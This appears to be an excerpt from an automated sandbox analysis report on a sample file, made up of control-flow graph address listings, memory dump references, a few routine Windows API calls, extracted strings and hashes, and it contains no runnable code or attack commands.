                                                                                              • API String ID: 0-1659197660
                                                                                              • Opcode ID: 91366f22e5dc5d0e01c39e2b60480655843e1c54f346cd4d23d4ccb5f542e841
                                                                                              • Instruction ID: fcd7e6968fa247deae6c1c701cb3886f614b2d32602778b06aa110edafcfc1a9
                                                                                              • Opcode Fuzzy Hash: 91366f22e5dc5d0e01c39e2b60480655843e1c54f346cd4d23d4ccb5f542e841
                                                                                              • Instruction Fuzzy Hash: D5025B34E40209CFEB14CFA8D88079DB7F6EB45358F50896AE405EB251DB32ED46CB92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 430 118729-11873f 431 118741-118744 430->431 432 118771-118774 431->432 433 118746-11876c 431->433 434 1187a1-1187a4 432->434 435 118776-11879c 432->435 433->432 436 1187d1-1187d4 434->436 437 1187a6-1187cc 434->437 435->434 440 118801-118804 436->440 441 1187d6-1187fc 436->441 437->436 442 118831-118834 440->442 443 118806-11882c 440->443 441->440 448 118861-118864 442->448 449 118836-11885c 442->449 443->442 450 118891-118894 448->450 451 118866-11888c 448->451 449->448 458 1188a5-1188a8 450->458 459 118896-118898 450->459 451->450 460 1188b5-1188b8 458->460 461 1188aa 458->461 644 11889a call 119f70 459->644 645 11889a call 119f80 459->645 646 11889a call 11a023 459->646 468 1188e5-1188e8 460->468 469 1188ba-1188e0 460->469 470 1188b0 461->470 465 1188a0 465->458 473 118915-118918 468->473 474 1188ea-118910 468->474 469->468 470->460 476 118945-118948 473->476 477 11891a-118940 473->477 474->473 481 118975-118978 476->481 482 11894a-118970 476->482 477->476 483 1189a5-1189a8 481->483 484 11897a-1189a0 481->484 482->481 489 1189d5-1189d8 483->489 490 1189aa-1189d0 483->490 484->483 491 118a05-118a08 489->491 492 1189da-118a00 489->492 490->489 499 118a35-118a38 491->499 500 118a0a-118a30 491->500 492->491 501 118a65-118a68 499->501 502 118a3a-118a60 499->502 500->499 509 118a95-118a98 501->509 510 118a6a-118a90 501->510 502->501 511 118ac5-118ac8 509->511 512 118a9a-118ac0 509->512 510->509 519 118af5-118af8 511->519 520 118aca-118af0 511->520 512->511 521 118b25-118b28 519->521 522 118afa-118b20 519->522 520->519 529 118b55-118b58 521->529 530 118b2a-118b50 521->530 522->521 531 118b85-118b88 529->531 532 118b5a-118b80 529->532 530->529 539 118bb5-118bb8 531->539 540 118b8a-118bb0 531->540 532->531 541 118be5-118be8 539->541 542 118bba-118be0 539->542 540->539 549 118c15-118c18 541->549 550 118bea-118c10 541->550 542->541 551 118c45-118c48 549->551 552 118c1a-118c40 549->552 550->549 559 118c65-118c68 551->559 560 118c4a-118c60 551->560 552->551 561 118c95-118c98 559->561 562 118c6a-118c90 559->562 560->559 569 118cc5-118cc8 561->569 570 118c9a-118cc0 561->570 562->561 571 118cf5-118cf8 569->571 572 118cca-118cf0 569->572 570->569 578 118d25-118d28 571->578 579 118cfa-118d20 571->579 572->571 581 118d55-118d58 578->581 582 118d2a-118d50 578->582 579->578 587 118d85-118d88 581->587 588 118d5a-118d80 581->588 582->581 590 118db5-118db8 587->590 591 118d8a-118db0 587->591 588->587 597 118de5-118de8 590->597 598 118dba-118de0 590->598 591->590 600 118e15-118e18 597->600 601 118dea-118e10 597->601 598->597 607 118e45-118e48 600->607 608 118e1a-118e40 600->608 601->600 610 118e75-118e78 607->610 611 118e4a-118e70 607->611 608->607 617 118ea5-118ea8 610->617 618 118e7a-118ea0 610->618 611->610 620 118ec3-118ec6 617->620 621 118eaa-118eb6 617->621 618->617 627 118ef3-118ef5 620->627 628 118ec8-118eee 620->628 639 118ebe 621->639 630 118ef7 627->630 631 118efc-118eff 627->631 628->627 630->631 631->431 637 118f05-118f0b 631->637 639->620 644->465 645->465 646->465
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8]5$@ ]5$`]5$`"]5$p$]5
                                                                                              • API String ID: 0-4245522692
                                                                                              • Opcode ID: 77772f76aafc21182503615e4e714fe021bc09d91f860c3271e4d3453bcea7cb
                                                                                              • Instruction ID: 74a7670efa0d33dfcbe0d5f439e8958153c0bfd91a6d92ec668fd86197f5ad44
                                                                                              • Opcode Fuzzy Hash: 77772f76aafc21182503615e4e714fe021bc09d91f860c3271e4d3453bcea7cb
                                                                                              • Instruction Fuzzy Hash: A9129B72B012058BDB29AB68D45166CB3E3EBC5311B608A3AE001DF355DF71FD879B92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 647 38ea5e88-38ea5f17 GetCurrentProcess 652 38ea5f19-38ea5f1f 647->652 653 38ea5f20-38ea5f54 GetCurrentThread 647->653 652->653 654 38ea5f5d-38ea5f91 GetCurrentProcess 653->654 655 38ea5f56-38ea5f5c 653->655 657 38ea5f9a-38ea5fb5 call 38ea6066 654->657 658 38ea5f93-38ea5f99 654->658 655->654 661 38ea5fbb-38ea5fea GetCurrentThreadId 657->661 658->657 662 38ea5fec-38ea5ff2 661->662 663 38ea5ff3-38ea6055 661->663 662->663
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F06
                                                                                              • GetCurrentThread.KERNEL32 ref: 38EA5F43
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F80
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 38EA5FD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: eea8c94b09294db91f9ab3210e87b40edeb102a117125f9fb9e6503d85e28db8
                                                                                              • Instruction ID: 0e3beb2431c787ba8fef9d459699861fceb482f7ca71aac07cb6ec5988b9c1b9
                                                                                              • Opcode Fuzzy Hash: eea8c94b09294db91f9ab3210e87b40edeb102a117125f9fb9e6503d85e28db8
                                                                                              • Instruction Fuzzy Hash: F35153B5D003098FDB14DFAAC545BDEBBF1EF88310F208059E419AB2A0DB78A941CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 693 38ea5e81-38ea5f17 GetCurrentProcess 698 38ea5f19-38ea5f1f 693->698 699 38ea5f20-38ea5f54 GetCurrentThread 693->699 698->699 700 38ea5f5d-38ea5f91 GetCurrentProcess 699->700 701 38ea5f56-38ea5f5c 699->701 703 38ea5f9a-38ea5fb5 call 38ea6066 700->703 704 38ea5f93-38ea5f99 700->704 701->700 707 38ea5fbb-38ea5fea GetCurrentThreadId 703->707 704->703 708 38ea5fec-38ea5ff2 707->708 709 38ea5ff3-38ea6055 707->709 708->709
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F06
                                                                                              • GetCurrentThread.KERNEL32 ref: 38EA5F43
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F80
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 38EA5FD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: c4fa99498510604aa440343efec6f02bc778d0f282ca076842eed8e5e82eedc2
                                                                                              • Instruction ID: 7e5d5de1a200a08575b321dd21787075d290a4931fb6b0ad53e5513bf61c3d0c
                                                                                              • Opcode Fuzzy Hash: c4fa99498510604aa440343efec6f02bc778d0f282ca076842eed8e5e82eedc2
                                                                                              • Instruction Fuzzy Hash: B15176B5D043098FDB14DFA9C4457EEBBF1EF88310F208059E029AB2A1DB789941CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 670 38ea5e79-38ea5f17 GetCurrentProcess 675 38ea5f19-38ea5f1f 670->675 676 38ea5f20-38ea5f54 GetCurrentThread 670->676 675->676 677 38ea5f5d-38ea5f91 GetCurrentProcess 676->677 678 38ea5f56-38ea5f5c 676->678 680 38ea5f9a-38ea5fb5 call 38ea6066 677->680 681 38ea5f93-38ea5f99 677->681 678->677 684 38ea5fbb-38ea5fea GetCurrentThreadId 680->684 681->680 685 38ea5fec-38ea5ff2 684->685 686 38ea5ff3-38ea6055 684->686 685->686
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F06
                                                                                              • GetCurrentThread.KERNEL32 ref: 38EA5F43
                                                                                              • GetCurrentProcess.KERNEL32 ref: 38EA5F80
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 38EA5FD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 0fe69bf5e5314ac8358d054c6395021f1bf4b469c93d96bdbc1b196b60842b45
                                                                                              • Instruction ID: 9ab21fe3a3b5abc21d80f99cdd320ca339d6b898886a16d18d07816db90691fd
                                                                                              • Opcode Fuzzy Hash: 0fe69bf5e5314ac8358d054c6395021f1bf4b469c93d96bdbc1b196b60842b45
                                                                                              • Instruction Fuzzy Hash: 7C5176B5D003098FDB14DFA9C5457EEBBF1AF88310F208059E029AB3A0DB789941CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 716 389c91e8-389c920d 717 389c920f-389c9212 716->717 718 389c9238-389c923b 717->718 719 389c9214-389c9233 717->719 720 389c9afb-389c9afd 718->720 721 389c9241-389c9256 718->721 719->718 723 389c9aff 720->723 724 389c9b04-389c9b07 720->724 728 389c926e-389c9284 721->728 729 389c9258-389c925e 721->729 723->724 724->717 726 389c9b0d-389c9b17 724->726 733 389c928f-389c9291 728->733 730 389c9260 729->730 731 389c9262-389c9264 729->731 730->728 731->728 734 389c92a9-389c931a 733->734 735 389c9293-389c9299 733->735 746 389c931c-389c933f 734->746 747 389c9346-389c9362 734->747 736 389c929d-389c929f 735->736 737 389c929b 735->737 736->734 737->734 746->747 752 389c938e-389c93a9 747->752 753 389c9364-389c9387 747->753 758 389c93ab-389c93cd 752->758 759 389c93d4-389c93ef 752->759 753->752 758->759 764 389c941a-389c9424 759->764 765 389c93f1-389c9413 759->765 766 389c9434-389c94ae 764->766 767 389c9426-389c942f 764->767 765->764 773 389c94fb-389c9510 766->773 774 389c94b0-389c94ce 766->774 767->726 773->720 778 389c94ea-389c94f9 774->778 779 389c94d0-389c94df 774->779 778->773 778->774 779->778
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q
                                                                                              • API String ID: 0-4102054182
                                                                                              • Opcode ID: 3ae99ec0cec883ef1d8d6d357ed487530b418cf0e5c004debf4e1f22ee5b4ca7
                                                                                              • Instruction ID: 7edaf16b5c62d3f96b3aba87d31d9d0d0de26e7c63ba1584c1f68c911ae3f2c4
                                                                                              • Opcode Fuzzy Hash: 3ae99ec0cec883ef1d8d6d357ed487530b418cf0e5c004debf4e1f22ee5b4ca7
                                                                                              • Instruction Fuzzy Hash: 0B915D74B002198FDB54DB69C8607AEBBB6BFC8340F508569D909EB348EF71DD428B91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1228 389ccfe0-389ccffb 1229 389ccffd-389cd000 1228->1229 1230 389cd002-389cd01e 1229->1230 1231 389cd023-389cd026 1229->1231 1230->1231 1232 389cd028-389cd03e 1231->1232 1233 389cd043-389cd046 1231->1233 1232->1233 1234 389cd08f-389cd092 1233->1234 1235 389cd048-389cd08a 1233->1235 1237 389cd094-389cd096 1234->1237 1238 389cd0a1-389cd0a4 1234->1238 1235->1234 1240 389cd09c 1237->1240 1241 389cd387-389cd390 1237->1241 1242 389cd0ed-389cd0f0 1238->1242 1243 389cd0a6-389cd0e8 1238->1243 1240->1238 1246 389cd39f-389cd3ab 1241->1246 1247 389cd392-389cd397 1241->1247 1249 389cd4cc-389cd4d8 1242->1249 1250 389cd0f6-389cd0f9 1242->1250 1243->1242 1253 389cd4bc-389cd4c1 1246->1253 1254 389cd3b1-389cd3c5 1246->1254 1247->1246 1257 389cd32e-389cd33d 1249->1257 1258 389cd4de-389cd7cb 1249->1258 1251 389cd0fb-389cd100 1250->1251 1252 389cd103-389cd106 1250->1252 1251->1252 1259 389cd14f-389cd152 1252->1259 1260 389cd108-389cd14a 1252->1260 1273 389cd4c9 1253->1273 1254->1273 1274 389cd3cb-389cd3dd 1254->1274 1261 389cd34c-389cd358 1257->1261 1262 389cd33f-389cd344 1257->1262 1443 389cd7d1-389cd7d7 1258->1443 1444 389cd9f2-389cd9fc 1258->1444 1270 389cd19b-389cd19e 1259->1270 1271 389cd154-389cd196 1259->1271 1260->1259 1265 389cd9fd-389cda36 1261->1265 1266 389cd35e-389cd370 1261->1266 1262->1261 1321 389cda38-389cda3b 1265->1321 1290 389cd375-389cd377 1266->1290 1275 389cd1e7-389cd1ea 1270->1275 1276 389cd1a0-389cd1af 1270->1276 1271->1270 1273->1249 1295 389cd3df-389cd3e5 1274->1295 1296 389cd401-389cd403 1274->1296 1278 389cd1ec-389cd22e 1275->1278 1279 389cd233-389cd236 1275->1279 1283 389cd1be-389cd1ca 1276->1283 1284 389cd1b1-389cd1b6 1276->1284 1278->1279 1291 389cd238-389cd23a 1279->1291 1292 389cd245-389cd248 1279->1292 1283->1265 1293 389cd1d0-389cd1e2 1283->1293 1284->1283 1304 389cd37e-389cd381 1290->1304 1305 389cd379 1290->1305 1291->1273 1298 389cd240 1291->1298 1300 389cd24a-389cd28c 1292->1300 1301 389cd291-389cd294 1292->1301 1293->1275 1308 389cd3e9-389cd3f5 1295->1308 1309 389cd3e7 1295->1309 1310 389cd40d-389cd419 1296->1310 1298->1292 1300->1301 1312 389cd2dd-389cd2e0 1301->1312 1313 389cd296-389cd2d8 1301->1313 1304->1229 1304->1241 1305->1304 1317 389cd3f7-389cd3ff 1308->1317 1309->1317 1332 389cd41b-389cd425 1310->1332 1333 389cd427 1310->1333 1315 389cd329-389cd32c 1312->1315 1316 389cd2e2-389cd324 1312->1316 1313->1312 1315->1257 1315->1290 1316->1315 1317->1310 1326 389cda3d-389cda69 1321->1326 1327 389cda6e-389cda71 1321->1327 1326->1327 1337 389cda94-389cda97 1327->1337 1338 389cda73-389cda8f 1327->1338 1341 389cd42c-389cd42e 1332->1341 1333->1341 1342 389cda99 call 389cdb55 1337->1342 1343 389cdaa6-389cdaa8 1337->1343 1338->1337 1341->1273 1348 389cd434-389cd450 call 389c6648 1341->1348 1353 389cda9f-389cdaa1 1342->1353 1344 389cdaaf-389cdab2 1343->1344 1345 389cdaaa 1343->1345 1344->1321 1355 389cdab4-389cdac3 1344->1355 1345->1344 1372 389cd45f-389cd46b 1348->1372 1373 389cd452-389cd457 1348->1373 1353->1343 1365 389cdb2a-389cdb3f 1355->1365 1366 389cdac5-389cdb28 call 389c6648 1355->1366 1380 389cdb40 1365->1380 1366->1365 1372->1253 1377 389cd46d-389cd4ba 1372->1377 1373->1372 1377->1273 1380->1380 1445 389cd7d9-389cd7de 1443->1445 1446 389cd7e6-389cd7ef 1443->1446 1445->1446 1446->1265 1447 389cd7f5-389cd808 1446->1447 1449 389cd80e-389cd814 1447->1449 1450 389cd9e2-389cd9ec 1447->1450 1451 389cd816-389cd81b 1449->1451 1452 389cd823-389cd82c 1449->1452 1450->1443 1450->1444 1451->1452 1452->1265 1453 389cd832-389cd853 1452->1453 1456 389cd855-389cd85a 1453->1456 1457 389cd862-389cd86b 1453->1457 1456->1457 1457->1265 1458 389cd871-389cd88e 1457->1458 1458->1450 1461 389cd894-389cd89a 1458->1461 1461->1265 1462 389cd8a0-389cd8b9 1461->1462 1464 389cd8bf-389cd8e6 1462->1464 1465 389cd9d5-389cd9dc 1462->1465 1464->1265 1468 389cd8ec-389cd8f6 1464->1468 1465->1450 1465->1461 1468->1265 1469 389cd8fc-389cd913 1468->1469 1471 389cd915-389cd920 1469->1471 1472 389cd922-389cd93d 1469->1472 1471->1472 1472->1465 1477 389cd943-389cd95c call 389c6648 1472->1477 1481 389cd95e-389cd963 1477->1481 1482 389cd96b-389cd974 1477->1482 1481->1482 1482->1265 1483 389cd97a-389cd9ce 1482->1483 1483->1465
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q
                                                                                              • API String ID: 0-3067366958
                                                                                              • Opcode ID: 7bc22bc80d50095372cfef487c2899fe8e57e1f04675b67f6636fc5a252b4e4f
                                                                                              • Instruction ID: 51d9a93c0f6824562cedc718f8b1b59d5bd422a6666e50d3632dfaa225839072
                                                                                              • Opcode Fuzzy Hash: 7bc22bc80d50095372cfef487c2899fe8e57e1f04675b67f6636fc5a252b4e4f
                                                                                              • Instruction Fuzzy Hash: 9E625934A003198FDB15DF68D990A9EB7B2FF84305B648A68D005AF359DB71FD86CB81

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1632 11ecc8-11ece9 1633 11eceb-11ecee 1632->1633 1634 11ecf0-11ecf7 1633->1634 1635 11ecfc-11ecff 1633->1635 1634->1635 1636 11ed01-11ed1d 1635->1636 1637 11ed22-11ed25 1635->1637 1636->1637 1638 11ed27-11ed35 1637->1638 1639 11ed3a-11ed3d 1637->1639 1638->1639 1640 11ed54-11ed57 1639->1640 1641 11ed3f-11ed49 1639->1641 1644 11ed59-11ed6a 1640->1644 1645 11ed6f-11ed72 1640->1645 1650 11ef63-11ef84 1641->1650 1651 11ed4f 1641->1651 1644->1645 1647 11ed74-11ed77 1645->1647 1648 11edcb-11edcf 1645->1648 1655 11edc6-11edc9 1647->1655 1656 11ed79-11edc1 1647->1656 1653 11f100-11f138 1648->1653 1654 11edd5 1648->1654 1671 11ef89-11ef8c 1650->1671 1651->1640 1687 11f14a 1653->1687 1688 11f13a-11f148 1653->1688 1657 11edda-11eddd 1654->1657 1655->1648 1655->1657 1656->1655 1660 11ee33-11ee36 1657->1660 1661 11eddf-11ee2e 1657->1661 1663 11ee38-11ee48 1660->1663 1664 11ee4d-11ee50 1660->1664 1661->1660 1663->1664 1668 11ee73-11ee76 1664->1668 1669 11ee52-11ee6e 1664->1669 1672 11ee84-11ee87 1668->1672 1673 11ee78-11ee7f 1668->1673 1669->1668 1676 11efac-11efaf 1671->1676 1677 11ef8e-11efa7 call 117b8c 1671->1677 1679 11ee89-11ee9a 1672->1679 1680 11ee9f-11eea2 1672->1680 1673->1672 1683 11efb1-11efc7 1676->1683 1684 11efcc-11efcf 1676->1684 1677->1676 1679->1680 1685 11eec2-11eec5 1680->1685 1686 11eea4-11eeb7 1680->1686 1683->1684 1697 11efd1-11f006 1684->1697 1698 11f00b-11f00d 1684->1698 1695 11eec7-11eecc 1685->1695 1696 11eecf-11eed2 1685->1696 1686->1634 1694 11eebd 1686->1694 1699 11f152-11f164 1687->1699 1688->1699 1694->1685 1695->1696 1702 11eed4-11eedb 1696->1702 1703 11eee6-11eee9 1696->1703 1697->1698 1704 11f014-11f017 1698->1704 1705 11f00f 1698->1705 1730 11f176 1699->1730 1731 11f166-11f174 1699->1731 1702->1653 1713 11eee1 1702->1713 1707 11ef11-11ef14 1703->1707 1708 11eeeb-11ef0c 1703->1708 1704->1633 1709 11f01d-11f02c 1704->1709 1705->1704 1716 11ef20-11ef23 1707->1716 1717 11ef16-11ef1d 1707->1717 1708->1707 1724 11f032-11f0e2 call 117b8c 1709->1724 1725 11f0e8-11f0fd 1709->1725 1713->1703 1718 11ef25-11ef3a 1716->1718 1719 11ef3f-11ef42 1716->1719 1718->1719 1726 11ef44-11ef59 1719->1726 1727 11ef5e-11ef61 1719->1727 1724->1725 1725->1653 1726->1727 1727->1650 1727->1671 1737 11f17e-11f1be 1730->1737 1731->1737 1749 11f1c6-11f1f9 1737->1749 1758 11f206 1749->1758 1759 11f1fb-11f200 1749->1759 1761 11f207 1758->1761 1759->1758 1761->1761
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PJAq$Teq$Teq
                                                                                              • API String ID: 0-3612174805
                                                                                              • Opcode ID: 9aefcd8c5bc69db937bfc34583228611d6cca4e21ae7d11e8126dcc827181028
                                                                                              • Instruction ID: ba486b2ffa0f83c0eef5779e0da2a93c58e31bf48572c15229887c3d62d1c9e5
                                                                                              • Opcode Fuzzy Hash: 9aefcd8c5bc69db937bfc34583228611d6cca4e21ae7d11e8126dcc827181028
                                                                                              • Instruction Fuzzy Hash: 2DE15C34A002159FDB28DBA8C490AAD77F2FF89310F648579E805EB355DB35ED86CB81

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1764 389c4c10-389c4c34 1765 389c4c36-389c4c39 1764->1765 1766 389c4c3f-389c4d37 1765->1766 1767 389c5318-389c531b 1765->1767 1787 389c4d3d-389c4d8a call 389c54b8 1766->1787 1788 389c4dba-389c4dc1 1766->1788 1768 389c533c-389c533e 1767->1768 1769 389c531d-389c5337 1767->1769 1771 389c5345-389c5348 1768->1771 1772 389c5340 1768->1772 1769->1768 1771->1765 1774 389c534e-389c535b 1771->1774 1772->1771 1801 389c4d90-389c4dac 1787->1801 1789 389c4e45-389c4e4e 1788->1789 1790 389c4dc7-389c4e37 1788->1790 1789->1774 1807 389c4e39 1790->1807 1808 389c4e42 1790->1808 1804 389c4dae 1801->1804 1805 389c4db7 1801->1805 1804->1805 1805->1788 1807->1808 1808->1789
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: fq$XPq$\Oq
                                                                                              • API String ID: 0-132346853
                                                                                              • Opcode ID: ceeeb40f76f9cd75b2748c453fd7f62757e3e3e2afe3c249fb023b6d4916fcc4
                                                                                              • Instruction ID: efddf0e586df3f718a300c002ce8c25934c8dd3b601f0216c5adbb301dada108
                                                                                              • Opcode Fuzzy Hash: ceeeb40f76f9cd75b2748c453fd7f62757e3e3e2afe3c249fb023b6d4916fcc4
                                                                                              • Instruction Fuzzy Hash: 03615D31F00208DFEB149BA5C815BAEBBF6FB88310F20852AE506AB395DE755D458F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \Vzm$\Vzm
                                                                                              • API String ID: 0-640428073
                                                                                              • Opcode ID: 9feb93d1985b304070bb3fd27db9fcde577c46d6a1047af59a5448175d5b396b
                                                                                              • Instruction ID: a6790e83be2f9d178ece5f76c152725e3058b51e03e24c1ad4f3791b7ee158aa
                                                                                              • Opcode Fuzzy Hash: 9feb93d1985b304070bb3fd27db9fcde577c46d6a1047af59a5448175d5b396b
                                                                                              • Instruction Fuzzy Hash: 32717D70E003499FDB28DFA9D8817DEBBF2AF48714F148139E415A7254DB749881CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \Vzm$\Vzm
                                                                                              • API String ID: 0-640428073
                                                                                              • Opcode ID: 60c71e515fce543030bb9e1fed6388ab3484f8e73118a8d7f2adb815fbfebc09
                                                                                              • Instruction ID: 0726a1e7f08d25a25a3c12b0dc852b7967c2231d732af8480f5e7e7ec6081011
                                                                                              • Opcode Fuzzy Hash: 60c71e515fce543030bb9e1fed6388ab3484f8e73118a8d7f2adb815fbfebc09
                                                                                              • Instruction Fuzzy Hash: C4719C70E003499FDF28CFA8D9817DEBBF2BF48714F148129E415AB254EB749881CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q
                                                                                              • API String ID: 0-3126353813
                                                                                              • Opcode ID: 1f45ecd3ca0a7728649ed8ea5fc8b2543427ace1f90215a3f3e87c2e41ec7a28
                                                                                              • Instruction ID: 29d9c1ee0c30809ec1f36e7fe322bc789a99884a19414da60796856d614f3d77
                                                                                              • Opcode Fuzzy Hash: 1f45ecd3ca0a7728649ed8ea5fc8b2543427ace1f90215a3f3e87c2e41ec7a28
                                                                                              • Instruction Fuzzy Hash: 44514F74B012049FDB54DB79C860BAE7BF7AF88340F508569D919EB348DB31DD428B91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q$4'q
                                                                                              • API String ID: 0-1467158625
                                                                                              • Opcode ID: b4d8986b1428ba2026701236fd6a6e65c366d40af5e88abb8a557255078d2986
                                                                                              • Instruction ID: 7e4fcc2cf3c18bcf83aacb30b9d5fd4bc032d9a4da8ed58c4d3c66a93316b6cc
                                                                                              • Opcode Fuzzy Hash: b4d8986b1428ba2026701236fd6a6e65c366d40af5e88abb8a557255078d2986
                                                                                              • Instruction Fuzzy Hash: 71518E70E002099FCB05EBA8D455ADEBBB2FF89300F504169E405BF266DB34AD46CF56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @1]5$@1]5
                                                                                              • API String ID: 0-3021202247
                                                                                              • Opcode ID: ef32a7e52a3209dcd5c2187e4b9c881d3a3e86ba4001f72727e840db49f58e84
                                                                                              • Instruction ID: 11446116c0c36de1cead09f608c81e750d585d23905d00e010e8f9f392fce390
                                                                                              • Opcode Fuzzy Hash: ef32a7e52a3209dcd5c2187e4b9c881d3a3e86ba4001f72727e840db49f58e84
                                                                                              • Instruction Fuzzy Hash: FF316C35E046059FDB09CFB4C854A9EBBF2AF89350F10855AE806AB360DB71AD46CB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @1]5$@1]5
                                                                                              • API String ID: 0-3021202247
                                                                                              • Opcode ID: 1a34b6161bbe0e53b80d5c9bbb580be22ed025ea310d47284334ab0897ba9b28
